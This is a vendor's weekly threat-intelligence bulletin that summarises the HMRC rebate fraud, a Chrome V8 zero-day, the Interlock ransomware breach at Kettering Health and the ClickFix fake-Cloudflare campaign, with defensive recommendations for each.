09.06.25 Threat Report

This week’s threat report: £47M HMRC Fraud, Criminals exploited over 100,000 taxpayer accounts via phishing. Malware-laden phishing pages that mimic Cloudflare security checks. A critical Chrome zero-day vulnerability, a major ransomware breach in US healthcare, and a dangerous new method of social engineering exploiting user habits.

1. £47 Million HMRC Fraud: Phishing and Identity Theft at Scale

The HMRC is grappling with the aftermath of a massive £47 million fraud campaign that exploited over 100,000 taxpayer accounts. Attackers used stolen credentials, mostly harvested via phishing, to file fake rebate claims. Although individual taxpayers didn’t lose money directly, the scheme sought to defraud the UK government at scale.

How It Happened:

• Fraudsters obtained login credentials and accessed taxpayer accounts via the Government Gateway.

• Compromised identities were used to submit false rebate claims.

• Many affected accounts were created before the real individuals ever signed up, leaving them unaware of the fraud.

• HMRC has since locked impacted accounts, deleted credentials, and notified users via letter.

This wasn't a breach of HMRC’s internal systems, but rather a coordinated abuse of legitimate digital infrastructure, highlighting how identity fraud has become as dangerous as direct cyberattacks.

Recommendations:

• If HMRC notifies you, follow the re-registration steps carefully.

• Regularly audit Government Gateway and business accounts for unexpected access.

• Provide phishing awareness training across your organisation.

• Use multi-factor authentication (MFA) wherever available.

2. Chrome Zero-Day (CVE-2025-5419) Under Active Exploitation

Google has issued an emergency patch for Chrome after discovering an actively exploited zero-day (CVE-2025-5419). The flaw lies within the V8 JavaScript and WebAssembly engine and allows attackers to perform heap corruption via specially crafted web content.

Technical Detail:

• The vulnerability is an out-of-bounds read/write issue in Chrome’s V8 engine.

• Discovered by Google’s Threat Analysis Group on 27 May 2025.

• Addressed rapidly with a configuration update the following day.

• Exploitation appears to be limited, but further details remain confidential.

Recommendations:

• Immediately update Chrome to version 137.0.7151.68/.69.

• Ensure Chromium-based browsers (Edge, Brave, Opera) are patched.

• Monitor for unusual web behaviours or redirects in your environment.

• Use EDR tools that detect anomalous script execution.

3. Interlock Ransomware Hits Kettering Health: 941 GB Leaked

The Interlock ransomware group has claimed responsibility for a devastating breach at Kettering Health, exfiltrating 941 GB of sensitive data. The Ohio-based health provider experienced severe system outages, delayed appointments, and now faces reputational and regulatory fallout.

What Was Leaked:

• Over 700,000 files, including ID cards, payment data, and financial reports.

• Data is now listed on Interlock’s dark web leak site.

• The attack affected electronic health records (EHR), call centres, and patient scheduling systems.

Response:
Kettering Health refused to pay ransom, opting instead for a full system rebuild. The organisation has purged persistence tools and relaunched its Epic EHR platform.

Recommendations:

• Conduct regular backups and test restoration procedures.

• Implement zero-trust security for healthcare networks.

• Segment data storage to reduce breach impact.

• Train clinical and administrative staff in phishing and ransomware prevention.

4. ClickFix Attack Mimics Cloudflare to Deliver Malware

A newly analysed social engineering campaign uses a near-identical clone of Cloudflare’s Turnstile challenge to deliver malware via clipboard manipulation. The method exploits user habits and fatigue with verification screens.

Attack Chain:

1. Victims land on a phishing site with a fake Cloudflare Turnstile.

2. A PowerShell command is silently copied to the clipboard.

3. Users are instructed to press Win+R → Ctrl+V → Enter—unknowingly executing malware.

4. Payloads range from info-stealers like Lumma to RATs like NetSupport Manager.

Why It Works:

• Leverages Living off the Land Binaries (LoLBins).

• Bypasses traditional endpoint detection tools.

• Victims believe they’re passing a routine security check.

Recommendations:

• Educate staff on spotting fake CAPTCHA pages and pop-ups.

• Block PowerShell via Group Policy where not needed.

• Implement browser isolation for sensitive workflows.

• Use threat intelligence feeds to monitor phishing infrastructure.

Threat Intelligence Offerings

Stay ahead of emerging cyber threats with real-time insights from Periculo. Our updates provide you with critical information on the latest vulnerabilities, attacks, and security trends—all designed to help you protect your business and make informed decisions.

Contact us for more information

Subscribe to the Periculo Threat Feed Today your first line of defence starts with staying informed.